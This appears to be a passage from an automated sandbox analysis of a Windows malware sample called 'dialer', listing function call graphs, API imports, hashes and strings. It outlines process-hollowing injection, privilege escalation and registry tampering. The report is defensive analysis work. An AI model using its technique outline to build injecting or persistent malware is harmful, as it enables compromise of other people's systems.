                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                      • String ID:
                                                                      • API String ID: 3676546796-0
                                                                      • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                      • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                      Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                      • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                        • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                        • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                        • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                      • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                      • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                      • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                      • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 1323846700-0
                                                                      • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                      • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                      Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenWow64
                                                                      • String ID:
                                                                      • API String ID: 10462204-0
                                                                      • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                      • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                      Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                                      APIs
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                        • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                        • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                        • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                        • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                        • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                        • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                        • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                        • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                        • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                        • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                        • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                        • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                        • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                        • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                      • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                      • String ID:
                                                                      • API String ID: 3836936051-0
                                                                      • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                      • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                      Non-executed Functions

                                                                      Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                      • String ID: SOFTWARE$dialerstager$open
                                                                      • API String ID: 3276259517-3931493855
                                                                      • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                      • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                      • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                      • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                      Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                      • String ID: @
                                                                      • API String ID: 3462610200-2766056989
                                                                      • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                      • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                      • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                      • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                      Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                      • String ID: dialersvc64
                                                                      • API String ID: 4184240511-3881820561
                                                                      • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                      • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                      Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Delete$CloseEnumOpen
                                                                      • String ID: SOFTWARE\dialerconfig
                                                                      • API String ID: 3013565938-461861421
                                                                      • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                      • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                      Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: File$Write$CloseCreateHandle
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 148219782-3440882674
                                                                      • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                      • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                      Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 1646373207-2227199552
                                                                      • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                      • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                      Execution Graph

                                                                      Execution Coverage:2.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:899
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 2988 140001ac3 2991 140001a70 2988->2991 2989 14000199e 2993 140001a0f 2989->2993 2994 1400019e9 VirtualProtect 2989->2994 2990 140001b36 2992 140001ba0 4 API calls 2990->2992 2991->2989 2991->2990 2995 140001b53 2991->2995 2992->2995 2994->2989 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2101 140001bc2 2098->2101 2099 140001c04 memcpy 2099->2096 2101->2099 2102 140001c45 VirtualQuery 2101->2102 2103 140001cf4 2101->2103 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006630 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtQueryAttributesFile 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2218 140002218 2212->2218 2214 14000220b LeaveCriticalSection 2213->2214 2220 14000212e 2213->2220 2214->2218 2215 140002272 2216 14000214d TlsGetValue GetLastError 2216->2220 2217 140002241 DeleteCriticalSection 2217->2215 2218->2215 2218->2217 2219 140002230 free 2218->2219 2219->2217 2219->2219 2220->2214 2220->2216 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2111 140001e99 2109->2111 2110->2111 2112 140001e82 signal 2110->2112 2112->2111 2996 140001f47 2997 140001e67 signal 2996->2997 2999 140001e99 2996->2999 2998 140001e7c 2997->2998 2997->2999 2998->2999 3000 140001e82 signal 2998->3000 3000->2999 2113 14000216f 2114 140002185 2113->2114 2115 140002178 InitializeCriticalSection 2113->2115 2115->2114 2116 140001a70 2119 14000199e 2116->2119 2120 140001a7d 2116->2120 2117 140001a0f 2118 1400019e9 VirtualProtect 2118->2119 2119->2117 2119->2118 2120->2116 2121 140001b53 2120->2121 2122 140001b36 2120->2122 2123 140001ba0 4 API calls 2122->2123 2123->2121 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 3001 140002050 3002 14000205e EnterCriticalSection 3001->3002 3003 1400020cf 3001->3003 3004 1400020c2 LeaveCriticalSection 3002->3004 3005 140002079 3002->3005 3004->3003 3005->3004 3006 1400020bd free 3005->3006 3006->3004 3007 140001fd0 3008 140001fe4 3007->3008 3009 140002033 3007->3009 3008->3009 3010 140001ffd EnterCriticalSection LeaveCriticalSection 3008->3010 3010->3009 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 14000199e 2239->2240 2241 140001b36 2239->2241 2244 140001b53 2239->2244 2243 140001a0f 2240->2243 2245 1400019e9 VirtualProtect 2240->2245 2242 140001ba0 4 API calls 2241->2242 2242->2244 2245->2240 2080 140001394 2084 140006630 2080->2084 2082 1400013b8 2083 1400013c6 NtQueryAttributesFile 2082->2083 2085 14000664e 2084->2085 2088 14000667b 2084->2088 2085->2082 2086 140006723 2087 14000673f malloc 2086->2087 2089 140006760 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006bd0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 